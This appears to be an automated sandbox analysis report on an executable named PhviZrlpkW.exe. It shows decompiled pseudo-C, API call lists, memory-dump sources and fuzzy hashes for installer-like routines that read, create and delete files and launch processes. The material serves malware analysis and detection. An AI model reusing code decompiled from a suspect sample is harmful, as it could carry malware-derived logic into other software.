                    											 *(__ebp - 0x5c) = __cl;
                    											 *(__eax + __edx) = __cl;
                    											__eax = __eax + 1;
                    											__edx = 0;
                    											_t274 = __eax %  *(__ebp - 0x74);
                    											__eax = __eax /  *(__ebp - 0x74);
                    											__edx = _t274;
                    											__eax =  *(__ebp - 0x68);
                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    											_t283 = __ebp - 0x64;
                    											 *_t283 =  *(__ebp - 0x64) - 1;
                    											__eflags =  *_t283;
                    											 *( *(__ebp - 0x68)) = __cl;
                    											L79:
                    											 *(__ebp - 0x14) = __edx;
                    											goto L80;
                    										case 0x1c:
                    											while(1) {
                    												L123:
                    												__eflags =  *(__ebp - 0x64);
                    												if( *(__ebp - 0x64) == 0) {
                    													break;
                    												}
                    												__eax =  *(__ebp - 0x14);
                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    												__eflags = __eax -  *(__ebp - 0x74);
                    												if(__eax >=  *(__ebp - 0x74)) {
                    													__eax = __eax +  *(__ebp - 0x74);
                    													__eflags = __eax;
                    												}
                    												__edx =  *(__ebp - 8);
                    												__cl =  *(__eax + __edx);
                    												__eax =  *(__ebp - 0x14);
                    												 *(__ebp - 0x5c) = __cl;
                    												 *(__eax + __edx) = __cl;
                    												__eax = __eax + 1;
                    												__edx = 0;
                    												_t414 = __eax %  *(__ebp - 0x74);
                    												__eax = __eax /  *(__ebp - 0x74);
                    												__edx = _t414;
                    												__eax =  *(__ebp - 0x68);
                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                    												__eflags =  *(__ebp - 0x30);
                    												 *( *(__ebp - 0x68)) = __cl;
                    												 *(__ebp - 0x14) = _t414;
                    												if( *(__ebp - 0x30) > 0) {
                    													continue;
                    												} else {
                    													L80:
                    													 *(__ebp - 0x88) = 2;
                    													goto L1;
                    												}
                    											}
                    											 *(__ebp - 0x88) = 0x1c;
                    											goto L170;
                    									}
                    								}
                    								L171:
                    								_t535 = _t534 | 0xffffffff;
                    								goto L172;
                    							}
                    						}
                    					}
                    				}
                    			}













                    0x00406fd1
                    0x00406fd3
                    0x00406fd3
                    0x00406fed
                    0x00406ff4
                    0x00406ff7
                    0x00000000
                    0x00406ff9
                    0x00000000
                    0x00406ff9
                    0x00000000
                    0x00407286
                    0x00407286
                    0x0040728a
                    0x004075b1
                    0x00000000
                    0x004075b1
                    0x00407290
                    0x00407293
                    0x00407296
                    0x0040729a
                    0x0040729d
                    0x004072a3
                    0x004072a5
                    0x004072a5
                    0x004072a5
                    0x004072a8
                    0x00000000
                    0x00000000
                    0x00407056
                    0x00407056
                    0x00407059
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x004073cb
                    0x00000000
                    0x00407395
                    0x00407399
                    0x004073bb
                    0x004073be
                    0x004073c8
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x004073cb
                    0x004073cb
                    0x0040739b
                    0x0040739e
                    0x004073a2
                    0x004073a5
                    0x004073a5
                    0x004073a8
                    0x00000000
                    0x00000000
                    0x00407452
                    0x00407456
                    0x00407474
                    0x00407474
                    0x00407474
                    0x0040747b
                    0x00407482
                    0x00407489
                    0x00407489
                    0x00000000
                    0x00407489
                    0x00407458
                    0x0040745b
                    0x0040745e
                    0x00407461
                    0x00407468
                    0x004073ac
                    0x004073ac
                    0x004073af
                    0x00000000
                    0x00000000
                    0x00407543
                    0x00407546
                    0x00407447
                    0x00000000
                    0x00000000
                    0x0040717d
                    0x0040717f
                    0x00407186
                    0x00407187
                    0x00407189
                    0x0040718c
                    0x00000000
                    0x00000000
                    0x00407194
                    0x00407197
                    0x0040719a
                    0x0040719c
                    0x0040719e
                    0x0040719e
                    0x0040719f
                    0x004071a2
                    0x004071a9
                    0x004071ac
                    0x004071ba
                    0x00000000
                    0x00000000
                    0x00407490
                    0x00407490
                    0x00407493
                    0x0040749a
                    0x00000000
                    0x00000000
                    0x0040749f
                    0x0040749f
                    0x004074a3
                    0x004075db
                    0x00000000
                    0x004075db
                    0x004074a9
                    0x004074ac
                    0x004074af
                    0x004074b3
                    0x004074b6
                    0x004074bc
                    0x004074be
                    0x004074be
                    0x004074be
                    0x004074c1
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c7
                    0x004074c7
                    0x004074cb
                    0x0040752b
                    0x0040752e
                    0x00407533
                    0x00407534
                    0x00407536
                    0x00407538
                    0x0040753b
                    0x00407447
                    0x00407447
                    0x00000000
                    0x0040744d
                    0x00407447
                    0x004074cd
                    0x004074d3
                    0x004074d6
                    0x004074d9
                    0x004074dc
                    0x004074df
                    0x004074e2
                    0x004074e5
                    0x004074e8
                    0x004074eb
                    0x004074ee
                    0x00407507
                    0x0040750a
                    0x0040750d
                    0x00407510
                    0x00407514
                    0x00407516
                    0x00407516
                    0x00407517
                    0x0040751a
                    0x004074f0
                    0x004074f0
                    0x004074f8
                    0x004074fd
                    0x004074ff
                    0x00407502
                    0x00407502
                    0x0040751d
                    0x00407524
                    0x00000000
                    0x00407526
                    0x00000000
                    0x00407526
                    0x00000000
                    0x004071c2
                    0x004071c5
                    0x004071fb
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732e
                    0x0040732e
                    0x00407331
                    0x00407333
                    0x004075bd
                    0x00000000
                    0x004075bd
                    0x00407339
                    0x0040733c
                    0x00000000
                    0x00000000
                    0x00407342
                    0x00407346
                    0x00407349
                    0x00407349
                    0x00407349
                    0x00000000
                    0x00407349
                    0x004071c7
                    0x004071c9
                    0x004071cb
                    0x004071cd
                    0x004071d0
                    0x004071d1
                    0x004071d3
                    0x004071d5
                    0x004071d8
                    0x004071db
                    0x004071f1
                    0x004071f6
                    0x0040722e
                    0x0040722e
                    0x00407232
                    0x0040725e
                    0x00407260
                    0x00407267
                    0x0040726a
                    0x0040726d
                    0x0040726d
                    0x00407272
                    0x00407272
                    0x00407274
                    0x00407277
                    0x0040727e
                    0x00407281
                    0x004072ae
                    0x004072ae
                    0x004072b1
                    0x004072b4
                    0x00407328
                    0x00407328
                    0x00407328
                    0x00000000
                    0x00407328
                    0x004072b6
                    0x004072bc
                    0x004072bf
                    0x004072c2
                    0x004072c5
                    0x004072c8
                    0x004072cb
                    0x004072ce
                    0x004072d1
                    0x004072d4
                    0x004072d7
                    0x004072f0
                    0x004072f2
                    0x004072f5
                    0x004072f6
                    0x004072f9
                    0x004072fb
                    0x004072fe
                    0x00407300
                    0x00407302
                    0x00407305
                    0x00407307
                    0x0040730a
                    0x0040730e
                    0x00407310
                    0x00407310
                    0x00407311
                    0x00407314
                    0x00407317
                    0x004072d9
                    0x004072d9
                    0x004072e1
                    0x004072e6
                    0x004072e8
                    0x004072eb
                    0x004072eb
                    0x0040731a
                    0x00407321
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x00000000
                    0x00407323
                    0x00000000
                    0x00407323
                    0x00407321
                    0x00407234
                    0x00407237
                    0x00407239
                    0x0040723c
                    0x0040723f
                    0x00407242
                    0x00407244
                    0x00407247
                    0x0040724a
                    0x0040724a
                    0x0040724d
                    0x0040724d
                    0x00407250
                    0x00407257
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x00000000
                    0x00407259
                    0x00000000
                    0x00407259
                    0x00407257
                    0x004071dd
                    0x004071e0
                    0x004071e2
                    0x004071e5
                    0x00000000
                    0x00000000
                    0x00406f44
                    0x00406f44
                    0x00406f48
                    0x0040758d
                    0x00000000
                    0x0040758d
                    0x00406f4e
                    0x00406f51
                    0x00406f54
                    0x00406f57
                    0x00406f5a
                    0x00406f5d
                    0x00406f60
                    0x00406f62
                    0x00406f65
                    0x00406f68
                    0x00406f6b
                    0x00406f6d
                    0x00406f6d
                    0x00406f6d
                    0x00000000
                    0x00000000
                    0x004070cf
                    0x004070cf
                    0x004070d3
                    0x00407599
                    0x00000000
                    0x00407599
                    0x004070d9
                    0x004070dc
                    0x004070df
                    0x004070e2
                    0x004070e4
                    0x004070e4
                    0x004070e4
                    0x004070e7
                    0x004070ea
                    0x004070ed
                    0x004070f0
                    0x004070f3
                    0x004070f6
                    0x004070f7
                    0x004070f9
                    0x004070f9
                    0x004070f9
                    0x004070fc
                    0x004070ff
                    0x00407102
                    0x00407105
                    0x00407105
                    0x00407105
                    0x00407108
                    0x0040710a
                    0x0040710a
                    0x00000000
                    0x00000000
                    0x0040734c
                    0x0040734c
                    0x0040734c
                    0x00407350
                    0x00000000
                    0x00000000
                    0x00407356
                    0x00407359
                    0x0040735c
                    0x0040735f
                    0x00407361
                    0x00407361
                    0x00407361
                    0x00407364
                    0x00407367
                    0x0040736a
                    0x0040736d
                    0x00407370
                    0x00407373
                    0x00407374
                    0x00407376
                    0x00407376
                    0x00407376
                    0x00407379
                    0x0040737c
                    0x0040737f
                    0x00407382
                    0x00407385
                    0x00407389
                    0x0040738b
                    0x0040738e
                    0x00000000
                    0x00407390
                    0x0040710d
                    0x0040710d
                    0x00000000
                    0x0040710d
                    0x0040738e
                    0x004075c3
                    0x00000000
                    0x00000000
                    0x00406bf2
                    0x004075fa
                    0x004075fa
                    0x00000000
                    0x004075fa
                    0x00407447
                    0x004073ce
                    0x004073cb

                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                    • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                    • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                    • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 41%
                    			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
                    				int _t9;
                    				long _t13;
                    				WCHAR* _t14;
                    
                    				_t14 = _a4;
                    				_t13 = E00406133(_t14);
                    				if(_t13 == 0xffffffff) {
                    					L8:
                    					return 0;
                    				}
                    				_push(_t14);
                    				if((_a8 & 0x00000001) == 0) {
                    					_t9 = DeleteFileW();
                    				} else {
                    					_t9 = RemoveDirectoryW(); // executed
                    				}
                    				if(_t9 == 0) {
                    					if((_a8 & 0x00000004) == 0) {
                    						SetFileAttributesW(_t14, _t13);
                    					}
                    					goto L8;
                    				} else {
                    					return 1;
                    				}
                    			}







                    APIs
                      • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                      • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                    • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                    • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                    Similarity
                    • API ID: File$Attributes$DeleteDirectoryRemove
                    • String ID:
                    • API String ID: 1655745494-0
                    • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                    • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                    • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                    • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00406AE0(void* __ecx, void* _a4) {
                    				long _v8;
                    				long _t6;
                    
                    				_t6 = WaitForSingleObject(_a4, 0x64);
                    				while(_t6 == 0x102) {
                    					E00406A71(0xf);
                    					_t6 = WaitForSingleObject(_a4, 0x64);
                    				}
                    				GetExitCodeProcess(_a4,  &_v8); // executed
                    				return _v8;
                    			}






                    APIs
                    • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                    • GetExitCodeProcess.KERNELBASE ref: 00406B13
                    Similarity
                    • API ID: ObjectSingleWait$CodeExitProcess
                    • String ID:
                    • API String ID: 2567322000-0
                    • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                    • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                    • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                    • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                    				long _v8;
                    				long _t21;
                    				long _t22;
                    				void* _t24;
                    				long _t26;
                    				int _t27;
                    				long _t28;
                    				void* _t29;
                    				void* _t30;
                    				long _t31;
                    				long _t32;
                    				long _t36;
                    
                    				_t21 = _a4;
                    				if(_t21 >= 0) {
                    					_t32 = _t21 +  *0x42a2b8;
                    					 *0x420ef4 = _t32;
                    					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                    				}
                    				_t22 = E00403479(4);
                    				if(_t22 >= 0) {
                    					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
                    					if(_t24 == 0) {
                    						L18:
                    						_push(0xfffffffd);
                    						goto L19;
                    					} else {
                    						 *0x420ef4 =  *0x420ef4 + 4;
                    						_t36 = E00403479(_a4);
                    						if(_t36 < 0) {
                    							L21:
                    							_t22 = _t36;
                    						} else {
                    							if(_a12 != 0) {
                    								_t26 = _a4;
                    								if(_t26 >= _a16) {
                    									_t26 = _a16;
                    								}
                    								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                    								if(_t27 != 0) {
                    									_t36 = _v8;
                    									 *0x420ef4 =  *0x420ef4 + _t36;
                    									goto L21;
                    								} else {
                    									goto L18;
                    								}
                    							} else {
                    								if(_a4 <= 0) {
                    									goto L21;
                    								} else {
                    									while(1) {
                    										_t28 = _a4;
                    										if(_a4 >= 0x4000) {
                    											_t28 = 0x4000;
                    										}
                    										_v8 = _t28;
                    										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
                    										if(_t29 == 0) {
                    											goto L18;
                    										}
                    										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
                    										if(_t30 == 0) {
                    											_push(0xfffffffe);
                    											L19:
                    											_pop(_t22);
                    										} else {
                    											_t31 = _v8;
                    											_a4 = _a4 - _t31;
                    											 *0x420ef4 =  *0x420ef4 + _t31;
                    											_t36 = _t36 + _t31;
                    											if(_a4 > 0) {
                    												continue;
                    											} else {
                    												goto L21;
                    											}
                    										}
                    										goto L22;
                    									}
                    									goto L18;
                    								}
                    							}
                    						}
                    					}
                    				}
                    				L22:
                    				return _t22;
                    			}
















                    APIs
                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                    • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                    • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                    • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E004015C1(short __ebx, void* __eflags) {
                    				void* _t17;
                    				int _t23;
                    				void* _t25;
                    				signed char _t26;
                    				short _t28;
                    				short _t31;
                    				short* _t34;
                    				void* _t36;
                    
                    				_t28 = __ebx;
                    				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                    				_t17 = E00405FE2(_t16);
                    				_t32 = _t17;
                    				if(_t17 != __ebx) {
                    					do {
                    						_t34 = E00405F64(_t32, 0x5c);
                    						_t31 =  *_t34;
                    						 *_t34 = _t28;
                    						if(_t31 != _t28) {
                    							L5:
                    							_t25 = E00405C16( *(_t36 + 8));
                    						} else {
                    							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                    							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
                    								goto L5;
                    							} else {
                    								_t25 = E00405B99( *(_t36 + 8)); // executed
                    							}
                    						}
                    						if(_t25 != _t28) {
                    							if(_t25 != 0xb7) {
                    								L9:
                    								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                    							} else {
                    								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                    								if((_t26 & 0x00000010) == 0) {
                    									goto L9;
                    								}
                    							}
                    						}
                    						 *_t34 = _t31;
                    						_t32 = _t34 + 2;
                    					} while (_t31 != _t28);
                    				}
                    				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                    					_push(0xfffffff5);
                    					E00401423();
                    				} else {
                    					E00401423(0xffffffe6);
                    					E00406668(0x436000,  *(_t36 + 8));
                    					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                    					if(_t23 == 0) {
                    						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                    					}
                    				}
                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                    				return 0;
                    			}












                    APIs
                      • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560,00000000), ref: 00405FF0
                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                      • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                    • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                    • String ID:
                    • API String ID: 1892508949-0
                    • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                    • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                    • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                    • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E00401389(signed int _a4) {
                    				intOrPtr* _t6;
                    				void* _t8;
                    				void* _t10;
                    				signed int _t11;
                    				void* _t12;
                    				signed int _t16;
                    				signed int _t17;
                    				void* _t18;
                    
                    				_t17 = _a4;
                    				while(_t17 >= 0) {
                    					_t6 = _t17 * 0x1c +  *0x42a290;
                    					if( *_t6 == 1) {
                    						break;
                    					}
                    					_push(_t6); // executed
                    					_t8 = E00401434(); // executed
                    					if(_t8 == 0x7fffffff) {
                    						return 0x7fffffff;
                    					}
                    					_t10 = E0040136D(_t8);
                    					if(_t10 != 0) {
                    						_t11 = _t10 - 1;
                    						_t16 = _t17;
                    						_t17 = _t11;
                    						_t12 = _t11 - _t16;
                    					} else {
                    						_t12 = _t10 + 1;
                    						_t17 = _t17 + 1;
                    					}
                    					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                    						 *0x42924c =  *0x42924c + _t12;
                    						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
                    					}
                    				}
                    				return 0;
                    			}












                    APIs
                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                    • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                    • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                    • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405C4B(WCHAR* _a4) {
                    				struct _PROCESS_INFORMATION _v20;
                    				int _t7;
                    
                    				0x426750->cb = 0x44;
                    				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
                    				if(_t7 != 0) {
                    					CloseHandle(_v20.hThread);
                    					return _v20.hProcess;
                    				}
                    				return _t7;
                    			}






                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CloseCreateHandleProcess
                    • String ID:
                    • API String ID: 3712363035-0
                    • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                    • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                    • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                    • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00406A35(signed int _a4) {
                    				struct HINSTANCE__* _t5;
                    				signed int _t10;
                    
                    				_t10 = _a4 << 3;
                    				_t8 =  *(_t10 + 0x40a410);
                    				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                    				if(_t5 != 0) {
                    					L2:
                    					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                    				}
                    				_t5 = E004069C5(_t8); // executed
                    				if(_t5 == 0) {
                    					return 0;
                    				}
                    				goto L2;
                    			}






                    APIs
                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                      • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                      • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                      • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                    • String ID:
                    • API String ID: 2547128583-0
                    • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                    • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                    • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                    • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E00406158(WCHAR* _a4, long _a8, long _a12) {
                    				signed int _t5;
                    				void* _t6;
                    
                    				_t5 = GetFileAttributesW(_a4); // executed
                    				asm("sbb ecx, ecx");
                    				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                    				return _t6;
                    			}






                    APIs
                    • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\PhviZrlpkW.exe,80000000,00000003), ref: 0040615C
                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: File$AttributesCreate
                    • String ID:
                    • API String ID: 415043291-0
                    • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                    • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                    • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                    • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00406133(WCHAR* _a4) {
                    				signed char _t3;
                    				signed char _t7;
                    
                    				_t3 = GetFileAttributesW(_a4); // executed
                    				_t7 = _t3;
                    				if(_t7 != 0xffffffff) {
                    					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                    				}
                    				return _t7;
                    			}






                    APIs
                    • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                    • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                    • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                    • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                    • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405C16(WCHAR* _a4) {
                    				int _t2;
                    
                    				_t2 = CreateDirectoryW(_a4, 0); // executed
                    				if(_t2 == 0) {
                    					return GetLastError();
                    				}
                    				return 0;
                    			}





                    APIs
                    • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                    • GetLastError.KERNEL32 ref: 00405C2A
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
